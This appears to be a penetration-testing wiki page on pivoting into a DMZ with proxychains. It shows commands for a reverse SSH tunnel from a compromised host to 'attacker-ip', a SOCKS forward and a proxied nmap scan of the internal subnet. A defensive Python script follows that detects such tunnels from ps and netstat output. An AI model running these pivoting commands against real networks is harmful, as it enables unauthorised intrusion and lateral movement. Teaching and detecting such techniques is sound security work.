
Proxychains

lethanhtung01011980 edited this page Dec 23, 2019 · 13 revisions

Goals

  • To complement the dynamic port forwarding
  • To run any network tool through HTTP, SOCKS4, and SOCKS5 proxies.
  • Attacker traffic ====> port 8080 on the attacker PC =====> reverse SSH tunnel =======> the destination port on the victim PC, selected automatically from the tool's application protocol.

Connect to the DMZ network via a compromised DMZ PC

To check for listening ports

  • netstat -lntp

On the victim (compromised) DMZ PC, create a reverse SSH tunnel from its port 22 to port 2222 on the attacker PC

  • ssh -f -N root@attacker-ip -R 2222:127.0.0.1:22
  • Port 2222 is the listening port on the attacker PC
  • -f: run in the background
  • -N: do not execute a remote command; used for port forwarding only
  • -R: reverse (remote) port forwarding

On the attacker PC, create a dynamic (SOCKS) port forward on port 8080 through the SSH tunnel at port 2222

  • ssh -f -N -D 127.0.0.1:8080 -p 2222 victim-DMZ-user@127.0.0.1

On the attacker PC, use proxychains to reach the whole DMZ network

  • proxychains nmap --top-ports=20 -sT -Pn 172.16.40.0/24
  • proxychains sends the tool's connections to the SOCKS proxy listening on port 8080
  • The SSH dynamic forward acts as a SOCKS server.
  • 172.16.40.0/24 is the sample DMZ network
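The same chain seen from the blue side: the `ssh -R` client stays resident on the DMZ host, and the relay host ends up with loopback-only listeners for the -R endpoint (2222) and the -D SOCKS port (8080), which is exactly what the `netstat -lntp` check above shows. The script below is an added example, not part of this wiki; it parses constructed `ps -eo pid,user,args` and `netstat -lntp` snapshots (203.0.113.10 is a documentation-range placeholder for the attacker IP) and flags both artefacts.

```python
"""Spot SSH-based pivots like the one above from host snapshots.

Added example, not part of the wiki page. The inputs below are constructed:
a `ps -eo pid,user,args` listing from the DMZ host and a `netstat -lntp`
listing from the relay host; 203.0.113.10 is a placeholder attacker IP.
"""
import os
from typing import Dict, List

PS_SAMPLE = """\
  PID USER     COMMAND
  812 root     /usr/sbin/sshd -D
 1431 www-data /usr/sbin/apache2 -k start
 2045 root     ssh -f -N root@203.0.113.10 -R 2222:127.0.0.1:22
 2101 alice    ssh alice@10.0.0.5
"""

NETSTAT_SAMPLE = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 127.0.0.1:2222          0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      3310/ssh
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1431/apache2
"""

# ssh client options that set up forwarding: -R remote, -L local, -D dynamic, -w tun
FORWARD_FLAGS = ("-R", "-L", "-D", "-w")


def find_ssh_forwarders(ps_output: str) -> List[Dict]:
    """Return ssh *client* processes whose arguments request port forwarding.

    The reverse-tunnel step leaves exactly such a process on the DMZ host
    (``ssh -f -N ... -R 2222:127.0.0.1:22``). sshd is skipped so that its own
    ``-D`` (do not daemonise) is not mistaken for a dynamic forward.
    """
    hits = []
    for line in ps_output.splitlines():
        parts = line.split()
        if len(parts) < 3 or not parts[0].isdigit():
            continue  # header or malformed line
        pid, user, argv = int(parts[0]), parts[1], parts[2:]
        if os.path.basename(argv[0]) != "ssh":
            continue
        # Matches both "-R 2222:..." and the attached form "-R2222:...";
        # bundled short options such as "-fNR" are not parsed here.
        flags = [a[:2] for a in argv[1:] if a.startswith(FORWARD_FLAGS)]
        if not flags:
            continue
        dest = next((a for a in argv[1:] if "@" in a), None)
        hits.append({"pid": pid, "user": user, "flags": flags,
                     "destination": dest, "background": "-f" in argv})
    return hits


def find_loopback_ssh_listeners(netstat_output: str) -> List[Dict]:
    """Return LISTEN sockets owned by ssh/sshd bound to loopback on a port other than 22.

    On the relay host the -R endpoint (2222, owned by sshd) and the -D SOCKS
    port (8080, owned by the ssh client) both look like this in ``netstat -lntp``.
    """
    hits = []
    for line in netstat_output.splitlines():
        parts = line.split()
        if len(parts) < 7 or parts[0] not in ("tcp", "tcp6") or parts[5] != "LISTEN":
            continue
        addr, _, port = parts[3].rpartition(":")
        pid, _, program = parts[6].partition("/")
        if addr not in ("127.0.0.1", "::1") or port == "22":
            continue
        if program.startswith("ssh"):
            hits.append({"pid": int(pid), "program": program, "port": int(port)})
    return hits


if __name__ == "__main__":
    for h in find_ssh_forwarders(PS_SAMPLE):
        print(f"forwarding ssh client pid={h['pid']} user={h['user']} "
              f"flags={h['flags']} dest={h['destination']} background={h['background']}")
    for h in find_loopback_ssh_listeners(NETSTAT_SAMPLE):
        print(f"loopback listener port={h['port']} owner={h['program']} pid={h['pid']}")
```

Run it against live output by piping `ps -eo pid,user,args` and `netstat -lntp` into the two functions; a `-f -N` ssh client with `-R` on a server that has no business opening outbound SSH, or an `sshd`-owned loopback listener on a high port, is the signal worth alerting on.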
